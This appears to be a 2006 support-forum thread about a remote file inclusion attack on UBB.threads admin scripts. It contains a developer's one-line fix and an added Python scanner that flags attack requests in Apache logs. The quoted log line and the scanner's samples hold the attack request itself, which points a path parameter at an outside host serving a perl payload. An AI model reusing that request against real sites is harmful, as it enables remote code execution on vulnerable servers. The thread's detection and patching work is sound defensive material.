stranger
Joined: May 2006
Posts: 9
There is a flaw in doeditconfig.php and doedittheme.php. The symptom is that config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the Apache log is:

158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd .gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme. This is being run from multiple locations; we had a different one from Spain as well. I'm running 6.5.1 with the other security hole fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.
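As an added example (not code from this thread or from UBB.threads itself): a small Python scanner that reads Apache combined-format access log lines and flags requests to the two admin scripts named above whose `thispath` or `config[path]` parameter carries a URL scheme (a remote include) or a `..` path segment. The sample log lines are constructed for this example; the first is modelled on the line quoted in the post above, treating the space in `cmd .gif` as a line-wrap artifact, and the other client addresses are documentation ranges. The log regex, the parameter list and the verdict names are this example's own assumptions.

```python
import re
import sys
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format. This regex is the example's own; it is not
# taken from UBB.threads or from the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two admin scripts named in the thread, matched on basename so a board
# installed under any prefix (/ubb/, /forums/, ...) is covered.
WATCHED_SCRIPTS = {"doeditconfig.php", "doedittheme.php"}

# Query parameters the request in the thread abuses, checked in this fixed
# order so the verdict for a line is deterministic.
WATCHED_PARAMS = ("config[path]", "thispath")

# A URL scheme at the start of a path parameter means the value would be
# fetched remotely if it ever reached include()/require().
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample lines (not real traffic). The first mirrors the line in
# the post above with the wrapped "cmd .gif" joined back together.
SAMPLE_LOG = [
    '158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php'
    '?thispath=../includes&config[path]=http://abok.us/cmd.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"',
    '198.51.100.7 - - [30/Sep/2006:02:11:40 -0700] "GET /ubb/admin/doedittheme.php'
    '?thispath=http%3A%2F%2F198.51.100.7%2Fcmd.txt%3F HTTP/1.1" 200 171 "-" "libwww-perl/5.65"',
    '203.0.113.5 - - [30/Sep/2006:02:12:01 -0700] "GET /ubb/ubbthreads.php HTTP/1.1" 200 8813 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Sep/2006:02:13:27 -0700] "GET /ubb/admin/doeditconfig.php HTTP/1.1" 200 44 "-" "curl/7.15.5"',
]


def classify(line):
    """Return (verdict, reason) for one access-log line.

    verdict is one of "unparsed", "ok", "suspicious", "traversal", "rfi".
    """
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return "unparsed", "line does not match the combined log format"
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_SCRIPTS:
        return "ok", "not a watched admin script"

    # parse_qs percent-decodes values, so http%3A%2F%2F... is caught as well.
    params = parse_qs(parts.query, keep_blank_values=True)
    verdict, reasons = "suspicious", []
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SCHEME_RE.match(value):
                verdict = "rfi"
                reasons.append(f"{name} is a remote URL: {value}")
            elif ".." in value.split("/"):
                if verdict != "rfi":
                    verdict = "traversal"
                reasons.append(f"{name} climbs the tree: {value}")
    if not reasons:
        # Any direct hit on these scripts is worth a look even without payload.
        reasons.append(f"direct request to {script} with no path parameters")
    return verdict, "; ".join(reasons)


def scan(lines):
    """Return [(client_ip, verdict, reason)] for every line that is not benign."""
    hits = []
    for line in lines:
        verdict, reason = classify(line)
        if verdict in ("suspicious", "traversal", "rfi"):
            ip = LOG_RE.match(line.rstrip("\n")).group("ip")
            hits.append((ip, verdict, reason))
    return hits


if __name__ == "__main__":
    # With a log path as the only argument, scan that file; otherwise the samples.
    source = open(sys.argv[1], encoding="utf-8", errors="replace") if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, verdict, reason in scan(source):
        print(f"{ip:15} {verdict:10} {reason}")
```

Run it with no arguments to see the three sample hits, or point it at a real access_log to list every client that tried the include against these two scripts; the "suspicious" verdict covers direct calls to the admin scripts with no payload at all, which is exactly what the `IS_ADMIN` guard in the fixed releases is meant to stop.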
stranger
Joined: May 2006
Posts: 9
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1
This was fixed in either 6.5.4 or 6.5.5. Basically, each of these scripts needs this line at the top, after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on Bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.
enthusiast
Joined: Jun 2006
Posts: 742
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix.
stranger
Joined: Oct 2006
Posts: 2
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.
Former Developer
Joined: Jun 2006
Posts: 9,242 Likes: 1
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.